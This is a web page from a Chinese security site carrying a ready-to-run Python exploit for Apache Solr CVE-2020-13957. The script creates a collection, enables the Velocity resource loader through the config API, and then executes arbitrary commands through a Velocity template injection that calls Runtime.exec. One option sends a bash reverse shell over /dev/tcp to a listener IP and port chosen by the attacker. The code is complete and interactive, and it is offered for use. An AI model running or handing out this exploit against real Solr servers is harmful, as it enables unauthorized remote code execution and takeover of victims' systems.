menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right POC chevron_right Apache Solr RCE 未授权上传漏洞 CVE-2020-13957.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache Solr RCE 未授权上传漏洞 CVE-2020-13957.py
    5.76 KB / 2021-04-15 12:15:18
        #!/usr/bin/python3
    #-*- coding:utf-8 -*-
    # author : PeiQi
    # from   : http://wiki.peiqi.tech
    
    import requests
    import re
    import sys
    import os
    import json
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
        print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')
        print('+  \033[34mVersion: Apache Solr 6.6.0 -6.6.5        \033[0m')
        print('+  \033[34m         Apache Solr 7.0.0 -7.7.3        \033[0m')
        print('+  \033[34m         Apache Solr 8.0.0 -8.6.2        \033[0m')
        print('+  \033[36m使用格式: python3 cve-2020-13957.py       \033[0m')
        print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983   \033[0m')
        print('+  \033[36mZip    >>> vuln.zip(Zip文件名)            \033[0m')
        print('+  \033[36mCmd    >>> whoami(命令执行)              \033[0m')
        print('+  \033[36mCmd    >>> shell(反弹shell)              \033[0m')
        print('+------------------------------------------')
    
    
    def POC_1(target_url, file_name):
        core_name = str(input("\033[35mPlease input Create Core Name\nCore >>> \033[0m"))
        core_update = """%s/solr/admin/collections?action=CREATE&name=%s&numShards=1&replicationFactor=1&wt=xml&collection.configName=%s""" % (target_url, core_name, file_name.replace(".zip",""))
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        }
        response = requests.get(url=core_update, headers=headers, timeout=30)
        if response.status_code != 200:
            print("\033[31m[x] 创建Core失败 \033[0m")
            sys.exit(0)
        else:
            core = re.findall(r'<str name="core">(.*?)</str>',response.text)[0]
            vuln_url = target_url + "/solr/" + core + "/config"
            print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core + "/config\033[0m")
            return vuln_url,core
    
    def POC_2(target_url, core):
        open_params = target_url + "/solr/" + core + "/config"
        headers = {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
        }
        set_api_data = """
        {
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }
        """
        response = requests.request("POST", url=open_params, data=set_api_data, headers=headers, timeout=10)
        if response.status_code == 200:
            print("\033[32m[o] POST请求成功将params.resource.loader.enabled设置为True \033[0m")
        else:
            print("\033[31m[x] POST请求params.resource.loader.enabled设置为True失败 \033[0m")
            sys.exit(0)
    
    
    def POC_3(target_url, core, cmd):
        vuln_url = target_url + "/solr/" + core + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + cmd + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
        headers = {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
        }
        response = requests.request("GET", url=vuln_url, headers=headers, timeout=10)
        if "Error 500" in response.text:
            print("\033[31m[x] 代码执行失败,响应为 Error 500 \033[0m")
        else:
            print("\033[32m[o] 漏洞成功利用,响应为\n \033[0m",response.text)
    
    def POC_4(target_url, core, IP, PORT):
        # POC : /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx.xxx.xxx.xxx:9999 0>&1
        cmd = "%2Fbin%2Fbash%20-c%20%24%40%7Cbash%200%20echo%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261".format(IP, PORT)
        vnul_url = target_url + "/solr/" + core + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + cmd + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
        headers = {
            "Content-Type": "application/json",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
        }
        response = requests.request("GET", url=vnul_url, headers=headers)
    
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
        file_name = str(input("\033[35mPlease input File Name\nZip >>> \033[0m"))
        vuln_url,core = POC_1(target_url, file_name)
        POC_2(target_url, core)
    
        while True:
            cmd = input("\033[35mCmd >>> \033[0m")
            if cmd == "exit":
                sys.exit(0)
            elif cmd == "shell":
                IP   = str(input("\033[35m请输入监听IP   >>> \033[0m"))
                PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
                POC_4(target_url, core, IP, PORT)
            else:
                POC_3(target_url, core, cmd)
    
    links
    file_download